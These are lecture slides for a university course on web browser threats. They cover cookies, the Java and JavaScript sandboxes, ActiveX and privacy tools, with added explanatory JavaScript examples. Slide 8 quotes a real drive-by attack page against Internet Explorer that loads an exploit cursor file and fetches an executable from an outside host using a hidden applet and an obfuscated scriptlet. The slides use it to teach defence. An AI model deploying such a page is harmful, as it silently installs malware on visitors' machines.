Computer Security CS 426 Lecture 25 - PowerPoint PPT Presentation

Provided by: NINGH7
Slides: 46

1
Computer Security CS 426 Lecture 25
  • Web Browser Threats
  • (Most Slides taken from Prof. John Mitchell CS
    155 Slides at Stanford)

2
Browser and Network
[Figure: the browser runs on top of the OS and hardware; it sends a request over the network to a web site and receives a reply]
  • Browser sends requests
  • May reveal private information (in forms,
    cookies)
  • Browser receives information, code
  • May corrupt state by running unsafe code
  • Interaction susceptible to network attacks
  • Use HTTPS, which uses SSL/TLS

3
Outline
  • Browser review
  • Bugs happen
  • HTTP, scripts, events, DOM
  • Session state and cookies
  • Protecting the browser environment
  • Execution sandbox
  • Access policies, signed scripts
  • Privacy and confidentiality for sensitive
    information
  • Protecting the file system, OS, platform
  • Protecting information associated with other
    browser processes (e.g., other windows)
  • Protecting the user against deception
  • Protecting against traffic analysis

4
Tuesday, February 12, 2002
  • Microsoft Issues New IE Browser Security Patch
    By Richard Karpinski
  • Microsoft has released a security patch that
    closes some major holes in its Internet Explorer
    browser
  • The so-called "cumulative patch" fixes six
    different IE problems ...
  • Affected browsers include Internet Explorer 5.01,
    5.5 and 6.0.
  • Microsoft rated the potential security breaches
    as "critical."

5
Feb 2002 patch addresses
  • A buffer overrun associated with an HTML
    directive ... Hackers could use this breach to
    run malicious code on a user's system.
  • A scripting vulnerability that would let an
    attacker read files on a user's systems.
  • A vulnerability related to the display of file
    names ... Hackers could misrepresent the name
    of a file ... and trick a user into downloading
    an unsafe file.
  • A vulnerability that would allow a Web page to
    improperly invoke an application installed on a
    user's system to open a file on a Web site.
  • more

MS announced 20 vulnerabilities on April 13, 2004!!!
6
And then again last year,
  • Windows Security Updates Summary for April 2005
  • Published April 12, 2005
  • A security issue has been identified that
    could allow an attacker to compromise a computer
    running Internet Explorer and gain control over
    it. You can help protect your computer by
    installing this update from Microsoft. After you
    install this item, you may have to restart your
    computer.

7
Microsoft Security Bulletin MS06-013, April 2006
8
An Attack Incident Against IE Browser
  • One Click on a malicious URL
  • http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html
  • Result

<html><head><title></title></head><body> <style>
CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr") </style> <APPLET ARCHIVE='count.jar'
CODE='BlackBox.class' WIDTH=1 HEIGHT=1> <PARAM
NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET> <script> try { document.write('<object data=10911545105116115
58 109104116109108581021051081
0158 //C\fo''o.mht!''http://vxxxx''xxe.biz/
/adv''erts//033//targ.ch' 'm/targ''et.htm
type=text/x-scriptlet></ob''ject>') } catch(e) {}
</script> </body></html>
Related Microsoft security bulletins: MS05-002, MS03-011, MS04-013
9
An Attack Incident Against IE Browser
22 unwanted programs are installed without the user's consent
10
Browser security topics
  • Review HTTP, scripting
  • Controlling outgoing information
  • Cookies
  • Cookie mechanism, JunkBuster
  • Routing privacy
  • Anonymizer,
  • Privacy policy P3P
  • Risks from incoming executable code
  • JavaScript
  • ActiveX
  • Plug-ins
  • Java

11
HyperText Transfer Protocol
HTTP
  • Used to request and return data
  • Methods: GET, POST, HEAD, ...
  • Stateless request/response protocol
  • Each request is independent of previous requests
  • Statelessness has a significant impact on design
    and implementation of applications
  • Evolution
  • HTTP 1.0: simple
  • HTTP 1.1: more complex

12
HTML and Scripting
  • <html>
  • <P>
  • <script>
  • var num1, num2, sum
  • num1 = prompt("Enter first number")
  • num2 = prompt("Enter second number")
  • sum = parseInt(num1) + parseInt(num2)
  • alert("Sum " + sum)
  • </script>
  • </html>

Browser receives content, displays HTML and
executes scripts
13
Events
Mouse event causes page-defined function to be
called
  • <script type="text/javascript">
  • function whichButton(event) {
  •   if (event.button == 1)
  •     alert("You clicked the left mouse button!")
  •   else
  •     alert("You clicked the right mouse button!")
  • }
  • </script>
  • <body onmousedown="whichButton(event)">
  • </body>

Other events onLoad, onMouseMove, onKeyPress,
onUnLoad
14
Document object model (DOM)
  • Object-oriented interface used to read and write
    documents
  • web page in HTML is structured data
  • DOM provides representation of this hierarchy
  • Examples
  • Properties: document.alinkColor, document.URL,
    document.forms, document.links,
    document.anchors
  • Methods: document.write(document.referrer)
  • Also Browser Object Model (BOM)
  • Window, Document, Frames, History, Location,
    Navigator (type and version of browser)

15
Need for session state
[Figure: a user on www.e_buy.com moves through View Catalog, Select Item and Check out; the session is carried in each URL]
www.e_buy.com
www.e_buy.com/shopping.cfm?pID=269
www.e_buy.com/shopping.cfm?pID=269&item=1102030405
www.e_buy.com/checkout.cfm?pID=269&item=1102030405
Store session information in URL: easily read on the network
16
Store info across sessions?
  • Cookies
  • A cookie is a file created by an Internet site to
    store information on your computer

[Figure: on the first visit the browser enters form data and the server stores a cookie; on a later visit the server requests the cookie and the browser returns the data]
HTTP is a stateless protocol; cookies add state
17
Cookie
  • A named string stored by the browser
  • Accessible as property of the Document object
  • Can be read and written entirely on client side
    using Javascript

18
Browser runs many forms of mobile code
  • Java applets
  • ActiveX controls
  • Browser helpers
  • Javascripts

19
Security risks posed by mobile code
  • Compromise host
  • Write to file system
  • Interfere with other processes in browser
    environment
  • Steal information
  • Read file system
  • Read information associated with other browser
    processes (e.g., other windows)
  • Fool the user
  • Reveal information through traffic analysis

20
Browser sandbox
  • Sandboxing for security
  • Code executed in browser has only restricted
    access to OS, network, and browser data
    structures
  • Isolation for privacy
  • Similar to OS process isolation, conceptually
  • Browser is a weak OS
  • Same-origin principle
  • Only the site that stores some information in the
    browser may later read or modify that information
    (or depend on it in any way).

21
Java
  • General programming language
  • Web pages may contain Java code
  • Java executed by Java Virtual Machine
  • Special security measures associated with Java
    code from remote URLs
  • Javascript, other security models are based on
    Java security model

22
Java Applet
[Figure: an airline seat-selection applet running in a local window. Download: seat map, airline data. Local data: user profile, credit card. Transmission: select seat, encrypted message]

23
Mobile code security mechanisms
  • Examine code before executing
  • Java bytecode verifier performs critical tests
  • Interpret code and trap risky operations
  • Java bytecode interpreter does run-time tests
  • Security manager applies local access policy
  • Security manager policy based on
  • Site that supplied the code
  • Code signing: who signed it?

24
Java Virtual Machine Architecture
[Figure: A.java is compiled by the Java compiler to A.class; inside the Java Virtual Machine the loader takes A.class, and B.class from the network, and passes them through the verifier and linker to the bytecode interpreter]
25
Class loader
  • Runtime system loads classes as needed
  • When class is referenced, loader searches for
    file of compiled bytecode instructions
  • Default loading mechanism can be replaced
  • Define alternate ClassLoader object
  • Extend the abstract ClassLoader class and
    implementation
  • Can obtain bytecode from network
  • VM restricts applet communication to site that
    supplied applet

26
Verifier
  • Bytecode may not come from standard compiler
  • Evil hacker may write dangerous bytecode
  • Verifier checks correctness of bytecode
  • Every instruction must have a valid operation
    code
  • Every branch instruction must branch to the start
    of some other instruction, not middle of
    instruction
  • Every method must have a structurally correct
    signature
  • Every instruction obeys the Java type discipline
  • Last condition is fairly complicated.
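The checks listed above, applied to a constructed toy bytecode. This is an added example written for this transcript, not the JVM's verifier and not code from the lecture: the instruction set, opcode numbers and sample programs are invented for illustration, and the type check is a simplified abstract interpretation in which every instruction must be reached with one consistent operand-stack shape (the real verifier also merges types and handles locals, method calls and exception handlers).

```javascript
// Toy instruction set (constructed): opcode byte, optional one-byte operand.
// Each entry says how many bytes the instruction takes, which types it pops
// from the operand stack and which it pushes.
const OPS = {
  0x10: { name: 'PUSH_INT', len: 2, pop: [],             push: ['int'] },
  0x11: { name: 'PUSH_REF', len: 2, pop: [],             push: ['ref'] },
  0x20: { name: 'IADD',     len: 1, pop: ['int', 'int'], push: ['int'] },
  0x30: { name: 'JMP',      len: 2, pop: [],             push: [], branch: true },
  0x31: { name: 'IFZERO',   len: 2, pop: ['int'],        push: [], branch: true, fallthrough: true },
  0x40: { name: 'RET',      len: 1, pop: [],             push: [], terminal: true },
};

function verify(code) {
  // Check 1: every byte at an instruction position is a valid opcode,
  // and no instruction runs past the end of the code.
  const starts = new Set();
  for (let pc = 0; pc < code.length; ) {
    const op = OPS[code[pc]];
    if (!op) return { ok: false, reason: `invalid opcode 0x${code[pc].toString(16)} at ${pc}` };
    if (pc + op.len > code.length) return { ok: false, reason: `truncated instruction at ${pc}` };
    starts.add(pc);
    pc += op.len;
  }
  // Check 2: every branch lands on the start of an instruction, never in the middle.
  for (const pc of starts) {
    const op = OPS[code[pc]];
    if (op.branch && !starts.has(code[pc + 1])) {
      return { ok: false, reason: `branch at ${pc} into middle of instruction (${code[pc + 1]})` };
    }
  }
  // Check 3: type discipline. Walk every reachable path with a stack of TYPES
  // (not values); each pc must always be reached with the same stack shape.
  const seen = new Map();                 // pc -> stack shape already verified
  const work = [{ pc: 0, stack: [] }];
  while (work.length) {
    const { pc, stack } = work.pop();
    if (pc >= code.length) return { ok: false, reason: 'fell off end of code' };
    const key = stack.join(',');
    if (seen.has(pc)) {
      if (seen.get(pc) !== key) return { ok: false, reason: `inconsistent stack at ${pc}` };
      continue;
    }
    seen.set(pc, key);
    const op = OPS[code[pc]];
    const s = stack.slice();
    for (const want of op.pop) {
      const got = s.pop();
      if (got !== want) {
        return { ok: false, reason: `${op.name} at ${pc} expects ${want}, got ${got ?? 'empty stack'}` };
      }
    }
    s.push(...op.push);
    if (op.terminal) continue;
    if (op.branch) work.push({ pc: code[pc + 1], stack: s });
    if (!op.branch || op.fallthrough) work.push({ pc: pc + op.len, stack: s });
  }
  return { ok: true };
}

// Constructed sample programs, one per check.
const SAMPLES = {
  sum:            [0x10, 1, 0x10, 2, 0x20, 0x40],       // 1 + 2, return: passes
  badOpcode:      [0x99],                               // no such instruction
  truncated:      [0x10],                               // PUSH_INT with its operand missing
  midInstruction: [0x30, 1, 0x40],                      // JMP into the operand byte of itself
  typeError:      [0x11, 0, 0x10, 1, 0x20, 0x40],       // IADD on a ref and an int
  loop:           [0x10, 1, 0x31, 0, 0x40],             // loop back to 0 with an empty stack: passes
  inconsistent:   [0x10, 1, 0x30, 0],                   // loop back to 0 carrying an extra int
};

function runSamples() {
  const results = {};
  for (const [name, code] of Object.entries(SAMPLES)) results[name] = verify(code);
  return results;
}
```

Running `runSamples()` shows that only `sum` and `loop` verify; each other sample is rejected with the reason naming the failed check and the offending offset.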

27
Type Safety of JVM
  • Load-time type checking
  • Run-time type checking
  • All casts are checked to make sure type safe
  • All array references are checked to be within
    bounds
  • References are tested to be not null before
    dereference
  • Additional features
  • Automatic garbage collection
  • No pointer arithmetic
  • If program accesses memory, the memory is
    allocated to the program and declared with
    correct type

28
Security Manager
  • Java library functions call security manager
  • Security manager object answers at run time
  • Decide if calling code is allowed to do operation
  • Examine protection domain of calling class
  • Signer: organization that signed the code before
    loading
  • Location: URL where the Java classes came from
  • Uses the system policy to decide access
    permission

29
Stack Inspection
  • Permission depends on
  • Permission of calling method
  • Permission of all methods above it on stack
  • Up to method that is trusted and asserts this
    trust
  • Many details omitted

[Figure: call stack, method f calls method g, which calls method h, which calls java.io.FileInputStream]
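A simulation of the stack-inspection rule above, added for this transcript and not code from the lecture or from any JVM. The protection domains, permission names and the three call stacks (modelled on the f, g, h, FileInputStream figure) are constructed for illustration; the walk from the top of the stack downwards, and the early stop at a frame that asserted privilege, follow the rule as the slide states it.

```javascript
const FILE_READ = 'FileRead';

// Protection domains: what the system policy grants to code from each source.
// Constructed for the example.
const DOMAINS = {
  system:    { perms: new Set([FILE_READ, 'Net']) }, // core library, fully trusted
  signed:    { perms: new Set([FILE_READ]) },        // signed applet granted file read
  untrusted: { perms: new Set() },                   // plain applet from the network
};

// A call stack is an array of frames; index 0 is the oldest caller.
// frame = { method, domain, privileged }
// Walk from the top (most recent call) down: every frame's domain must hold
// the permission. A frame that asserted privilege vouches for its callers,
// so the walk stops there.
function checkPermission(stack, perm) {
  for (let i = stack.length - 1; i >= 0; i--) {
    const f = stack[i];
    if (!DOMAINS[f.domain].perms.has(perm)) {
      return { allowed: false, blockedBy: f.method };
    }
    if (f.privileged) return { allowed: true, stoppedAt: f.method };
  }
  return { allowed: true, stoppedAt: null };
}

// Constructed stacks corresponding to the figure: f -> g -> h -> FileInputStream
function scenarios() {
  const lib = { method: 'java.io.FileInputStream.<init>', domain: 'system', privileged: false };
  return {
    // Untrusted applet code on the stack: denied even though the library
    // method doing the actual read is fully trusted.
    appletReadsFile: checkPermission([
      { method: 'f', domain: 'untrusted', privileged: false },
      { method: 'g', domain: 'untrusted', privileged: false },
      { method: 'h', domain: 'untrusted', privileged: false },
      lib,
    ], FILE_READ),
    // Signed applet, every frame granted FileRead: allowed.
    signedReadsFile: checkPermission([
      { method: 'f', domain: 'signed', privileged: false },
      { method: 'g', domain: 'signed', privileged: false },
      { method: 'h', domain: 'signed', privileged: false },
      lib,
    ], FILE_READ),
    // Untrusted caller, but a trusted library method (hypothetical loadFont)
    // asserted privilege for a limited operation on the applet's behalf:
    // the walk stops at the asserting frame and never reaches f.
    privilegedHelper: checkPermission([
      { method: 'f', domain: 'untrusted', privileged: false },
      { method: 'loadFont', domain: 'system', privileged: true },
      lib,
    ], FILE_READ),
  };
}
```

The third scenario is the reason the rule says "up to method that is trusted and asserts this trust": without the privileged stop, no library could ever do a limited privileged operation for untrusted code, and with it, the asserting method takes responsibility for checking what it does on the caller's behalf.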
30
ActiveX
  • ActiveX controls reside on client's machine,
    activated by HTML object tag on the page
  • ActiveX controls are not interpreted by browser
  • Compiled binaries executed by client OS
  • Controls can be downloaded and installed
  • Security model relies on three components
  • Digital signatures to verify source of binary
  • IE policy can reject controls from network zones
  • Controls marked by author as safe for
    initialization, safe for scripting which affects
    the way control used
  • Once accepted, installed and started, no control
    over execution

31
Installing Controls
If you install and run, no further control over
the code.
In principle, browser/OS could apply sandboxing,
other techniques for containing risks in native
code. But don't count on it.
32
Risks associated with controls
  • MSDN Warning
  • An ActiveX control can be an extremely insecure
    way to provide a feature
  • Why?
  • As a COM object, a control can do any user action
  • read and write Windows registry
  • access the local file system
  • Other web pages can attack a control
  • Once installed, control can be accessed by any
    page
  • Page only needs to know class identifier (CLSID)
  • Recommendation: use other means if possible

http://msdn.microsoft.com/library/default.asp?url=/code/list/ie.asp
33
IE Browser Helper Objects (Extensions)
  • COM components loaded when IE starts up
  • Run in same memory context as the browser
  • Perform any action on IE windows and modules
  • Detect browser events
  • GoBack, GoForward, and DocumentComplete
  • Access browser menu, toolbar and make changes
  • Create windows to display additional information
  • Install hooks to monitor messages and actions
  • Summary: no protection from extensions

http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnwebgen/html/bho.asp
34
JavaScript
  • Executed by browser
  • Used in many attacks (to exploit other
    vulnerabilities)
  • Cookie attack from earlier slide (08 Nov 2001)
  • With the assistance of some JavaScript code,
    an attacker could construct a Web page or
    HTML-based e-mail that could access any cookie in
    the browser's memory or those stored on disk ...
  • JavaScript runs
  • Before the HTML is loaded, before the document is
    viewed
  • While the document is viewed, or as the browser
    is leaving

35
Javascript Security Model
  • Sandbox design (at least conceptually)
  • No direct file access or network access
  • Same-origin policy
  • Can only read properties of documents and windows
    from the same place: server, protocol, port
  • Access control with signed scripts
  • User can grant privileges to signed scripts
  • UniversalBrowserRead/Write
  • UniversalFileRead, ...
  • UniversalSendMail

Reference: http://www.devarticles.com/c/a/JavaScript/JavaScript-Security/
36
Examples, assuming www.example.com
Same-origin check applies to access to window
object of other frames, etc.
37
Problems with S-O Principle
  • Poorly enforced on some browsers
  • Particularly older browsers
  • Limitations if site hosts unrelated pages
  • Example: a web server often hosts sites for
    unrelated parties
  • http://www.example.com/account/
  • http://www.example.com/otheraccount/
  • Same-origin policy allows script on one page to
    access properties of a document from another
  • Can be bypassed in Cross-Site-Scripting attacks
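The same-origin comparison from slides 35 to 37, written out as an added example for this transcript (not code from the lecture or from any browser). Origin is the triple scheme, host, port; the path is deliberately not part of it, which is exactly why the two www.example.com accounts above end up in one origin. The code uses the WHATWG `URL` class available in Node.js and browsers; the test cases are constructed.

```javascript
// Default ports, so that http://host/ and http://host:80/ compare equal.
const DEFAULT_PORT = { 'http:': '80', 'https:': '443' };

// Reduce a URL to its origin triple. Path, query and fragment are ignored.
function originOf(urlString) {
  const u = new URL(urlString);
  return {
    scheme: u.protocol,
    host: u.hostname.toLowerCase(),
    port: u.port || DEFAULT_PORT[u.protocol] || '',
  };
}

// Two URLs are same-origin only if all three components match.
function sameOrigin(a, b) {
  const x = originOf(a), y = originOf(b);
  return x.scheme === y.scheme && x.host === y.host && x.port === y.port;
}

// Constructed cases for www.example.com; the comment gives the expected answer.
const CASES = [
  ['http://www.example.com/account/', 'http://www.example.com/otheraccount/'], // true: path is not part of origin
  ['http://www.example.com/',         'https://www.example.com/'],             // false: different scheme
  ['http://www.example.com/',         'http://www.example.com:8080/'],         // false: different port
  ['http://www.example.com/',         'http://example.com/'],                  // false: different host
  ['http://www.example.com/',         'http://www.example.com:80/index.html'], // true: explicit default port
];

function runCases() {
  return CASES.map(([a, b]) => sameOrigin(a, b));
}
```

The first case is the shared-hosting limitation from slide 37: two unrelated parties under one host name are, to the policy, the same party, so scripts in one account's pages can read the other's documents and cookies unless the site separates them by host name or port.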

38
Browser Cookie Management
  • Cookie same-origin ownership
  • Once a cookie is saved on your computer, only the
    Web site that created the cookie can read it.
  • Variations
  • Temporary cookies
  • Stored until you quit your browser
  • Persistent cookies
  • Remain until deleted or expire
  • Third-party cookies
  • Originates on or sent to a web site other than
    the one that provided the current page
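A small in-memory model of the browser's `document.cookie` property, added for this transcript to illustrate slides 17 and 38; it is not code from the lecture or from any browser. It shows the named-string form a script reads back, the one-cookie-per-assignment form a script writes, the difference between temporary and persistent cookies, and one caveat to "can be read and written entirely on the client side": a cookie the server marks `HttpOnly` is kept by the browser but never exposed through `document.cookie`. Cookie names, values and the Set-Cookie headers are constructed.

```javascript
class CookieJar {
  constructor() { this.store = new Map(); }   // name -> { value, httpOnly, expires }

  // What the browser does with a Set-Cookie response header from the server.
  setFromServer(header) {
    const [pair, ...attrs] = header.split(';').map(s => s.trim());
    const eq = pair.indexOf('=');
    const name = pair.slice(0, eq), value = pair.slice(eq + 1);
    const expAttr = attrs.find(a => a.toLowerCase().startsWith('expires='));
    this.store.set(name, {
      value,
      httpOnly: attrs.some(a => a.toLowerCase() === 'httponly'),
      // No Expires attribute: temporary cookie, gone when the browser quits.
      expires: expAttr ? new Date(expAttr.slice('expires='.length)) : null,
    });
  }

  // Reading document.cookie yields "a=1; b=2". HttpOnly cookies are omitted,
  // so script-side access only covers cookies without that flag.
  get cookie() {
    return [...this.store]
      .filter(([, c]) => !c.httpOnly)
      .map(([n, c]) => `${n}=${c.value}`)
      .join('; ');
  }

  // Writing document.cookie = "name=value; path=/" sets ONE cookie; the text
  // after the first ';' is attributes for the browser, not part of the value.
  set cookie(str) {
    const [pair] = str.split(';').map(s => s.trim());
    const eq = pair.indexOf('=');
    this.store.set(pair.slice(0, eq), { value: pair.slice(eq + 1), httpOnly: false, expires: null });
  }

  // Simulate quitting the browser: temporary cookies are dropped, persistent ones stay.
  quitBrowser() {
    for (const [n, c] of this.store) if (!c.expires) this.store.delete(n);
  }
}

// Split the document.cookie string into name/value pairs.
function parseCookies(cookieString) {
  const out = {};
  for (const part of cookieString.split(';')) {
    const p = part.trim();
    if (!p) continue;
    const eq = p.indexOf('=');
    out[p.slice(0, eq)] = p.slice(eq + 1);
  }
  return out;
}

// Constructed walk-through: two server-set cookies, one script-set cookie.
function demo() {
  const doc = new CookieJar();
  doc.setFromServer('sessionid=abc123; HttpOnly');                      // hidden from script
  doc.setFromServer('lang=en; Expires=Wed, 01 Jan 2031 00:00:00 GMT');  // persistent
  doc.cookie = 'theme=dark; path=/';                                    // temporary, written by script
  const visible = parseCookies(doc.cookie);
  doc.quitBrowser();
  const afterQuit = parseCookies(doc.cookie);
  return { visible, afterQuit };
}
```

`demo()` returns `visible` with `lang` and `theme` but no `sessionid`, and `afterQuit` with only `lang`: the session identifier never reached script, and only the cookie with an expiry date survived the restart.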

39
Third-party cookies
  • Get a page from merchant.com
  • Contains <img src="http://doubleclick.com/advt.gif">
  • Image fetched from DoubleClick.com
  • DoubleClick knows IP address and page you were
    looking at
  • DoubleClick sends back a suitable advertisement
  • Stores a cookie that identifies "you" at
    DoubleClick
  • Next time you get page with a doubleclick.com
    image
  • Your DoubleClick cookie is sent back to
    DoubleClick
  • DoubleClick could maintain the set of sites you
    viewed
  • Send back targeted advertising (and a new cookie)
  • Cooperating sites
  • Can pass information to DoubleClick in URL,
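The third-party cookie flow just described, simulated in memory as an added example for this transcript (not code from the lecture, DoubleClick or any browser). The host names `ads.example`, `merchant.example` and `news.example` are constructed stand-ins for doubleclick.com and the sites that embed its image; the ad server is a plain object instead of a network service. The example goes one step beyond the slide by also showing what the ad server learns when the browser refuses to store or send cookies for a host other than the page's own.

```javascript
const AD_HOST = 'ads.example';   // constructed stand-in for doubleclick.com

// The ad server: issues an identifier cookie on first contact and records
// the Referer (the page that embedded the image) of every later request
// against that identifier.
class AdServer {
  constructor() { this.nextId = 1; this.profiles = new Map(); }   // id -> [pages viewed]

  // request = { referer, cookie }; returns { setCookie, body }
  handleImageRequest(request) {
    let id = request.cookie;
    let setCookie = null;
    if (!id || !this.profiles.has(id)) {
      id = `uid${this.nextId++}`;
      this.profiles.set(id, []);
      setCookie = id;   // "Stores a cookie that identifies you at DoubleClick"
    }
    const history = this.profiles.get(id);
    history.push(request.referer);
    return { setCookie, body: `advert chosen from ${history.length} known page view(s)` };
  }
}

// A browser keeping one cookie per host. Every page it visits embeds
// <img src="http://ads.example/advt.gif">, so each visit sends the ad host
// a request carrying the page URL as Referer and any cookie held for that host.
class Browser {
  constructor(adServer, { blockThirdPartyCookies = false } = {}) {
    this.adServer = adServer;
    this.block = blockThirdPartyCookies;
    this.cookies = new Map();   // host -> cookie value
  }

  visit(pageUrl) {
    const pageHost = new URL(pageUrl).hostname;
    const thirdParty = pageHost !== AD_HOST;
    const useCookies = !(this.block && thirdParty);
    const res = this.adServer.handleImageRequest({
      referer: pageUrl,
      cookie: useCookies ? this.cookies.get(AD_HOST) : undefined,
    });
    if (res.setCookie && useCookies) this.cookies.set(AD_HOST, res.setCookie);
    return res.body;
  }
}

// Constructed browsing session across two unrelated sites.
const PAGES = [
  'http://merchant.example/catalog',
  'http://news.example/sports',
  'http://merchant.example/checkout',
];

// Returns what the ad server knows afterwards: identifier -> pages viewed.
function simulate({ blockThirdPartyCookies = false } = {}) {
  const ads = new AdServer();
  const me = new Browser(ads, { blockThirdPartyCookies });
  for (const p of PAGES) me.visit(p);
  return Object.fromEntries(ads.profiles);
}
```

With cookies allowed, `simulate()` leaves the ad server with a single identifier holding all three page URLs, merchant and news site alike. With `simulate({ blockThirdPartyCookies: true })` every request arrives without a cookie, the server mints a fresh identifier each time, and the three views cannot be linked to one another (the Referer still tells it which page was viewed, just not by whom).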

40
Cookie issues
  • Cookies maintain record of your browsing habits
  • Cookie stores information as set of name/value
    pairs
  • May include any information a web site knows
    about you
  • Sites track your activity from multiple visits to
    site
  • Sites can share this information (e.g.,
    DoubleClick)
  • Browser attacks could invade your privacy
  • 08 Nov 2001
  • Users of Microsoft's browser and e-mail
    programs could be vulnerable to having their
    browser cookies stolen or modified due to a new
    security bug in Internet Explorer (IE), the
    company warned today.

41
Preserving web privacy
  • Your IP address may be visible to web sites
  • This may reveal your employer, ISP, etc.
  • Can link activities on different sites, different
    times
  • Can you prevent sites from learning about you?
  • Anonymizer
  • Single site that hides origin of web request

42
Browsing Anonymizers
  • Web Anonymizer hides your IP address
  • What does anonymizer.com know about you?

www.anonymizer.com/cgi-bin/redirect.cgi?url=
[Figure: the Browser sends its request to the Anonymizer, which forwards it to the Server]
43
How web sites use your information
  • You may enter information to buy product
  • Name, address, credit card number,
  • How will web site use this information
  • Charge your card and mail your purchase
  • Give sales information to other businesses?
  • Platform for privacy preferences (P3P)
  • Framework for reaching agreement on use of
    personal information
  • Enforcement at server side is another matter

44
A Simple P3P Conversation
  • User agent: GET index.html
  • Service: Here is my P3P proposal - I collect
    click-stream data and computer information for
    web site and system administration and
    customization of site
  • User agent: OK, I accept your proposal
  • Service: Here is index.html

45
Coming Attractions
  • November 28
  • Web Application Security